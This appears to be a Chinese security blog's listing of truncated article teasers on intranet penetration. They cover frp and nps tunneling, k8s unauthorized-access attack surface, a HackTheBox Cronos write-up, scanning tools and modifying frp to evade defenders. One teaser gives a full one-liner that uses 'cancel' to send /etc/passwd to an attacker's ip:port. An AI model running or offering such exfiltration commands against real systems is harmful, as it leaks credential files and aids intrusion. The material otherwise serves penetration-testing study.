内网穿透工具frp1 文件下载地址:https://github.com/fatedier/frp/releases版本和操作系统对应关系2 搭建socks5代理配置文件如下:服务端:./...
工具:渗透内网快速浏览数据库表列名
找资料时,发现了一款有意思的工具,宣称“内网渗透中快速获取数据库所有库名,表名,列名;具体判断后再去翻数据,节省时间;适用于mysql,mssql”。感觉不错,源码是用C#写的,推荐给大家,在实际中还...
goon,集合了fscan和kscan等优秀工具功能的扫描爆破工具。
简介--------------------------------------------------------------------------------------------- ____...
云原生安全入门之k8s部分攻击面
点击蓝字 关注我们前言之前一直在学习k8s的基本概念和基本用法,今天来学习一下k8s的未授权攻击面。今天的内容主要是因为运维配置不当造成的攻击面。正文Kubernetes Api Server 未授权...
利用nps(docker部署)实现隐藏ip
前言之前听过nps是在内网碰到不出网的时候可以实现内网穿透,最近听师傅说可以docker部署nps然后利用socks5实现隐藏ip(也就是访问ip变成了我们vps从而实现隐藏ip),所以实际搭建了一下...
云原生安全入门之Controller与Service
点击蓝字 关注我们前言继续学习记录k8s,今天主要记录controller和service.正文controller是在集群上管理和运行容器的对象。Pod是通过Controller实现应用的运维,比如...
网络基础
网络基础前言《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。书是比较老了,anyway,还是本很好的书本篇是第2章网络基础,主要是s...
使用frps和frpc实现内网穿透
在下方公众号后台回复:【网络安全】,可获取给你准备的最新网安教程全家桶。内网穿透的作用包括跨网段访问一个局域网中的一台主机。如上图,假设我们想要通过主机 A 访问主机 C,但是主机 A 和主机 C 绑...
奇淫技巧:linux下无回显可将回显发送到服务器
靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...
Hackthebox - Cronos 靶场实战
靶场信息靶场类型信息收集Nmap┌──(root㉿lucifiel)-[~/Desktop]└─# nmap -sS -sC -sV -A ...
frp优化
前言 工欲善其事,必先利其器。由于frp并不是主要以渗透测试内网穿透为目的而开发的软件,所以为符合攻击对抗的要求需要对其进行改造来达到免杀、流量隐蔽等要求。 使用原版加载参数的方式一旦被防守者发现极易...
10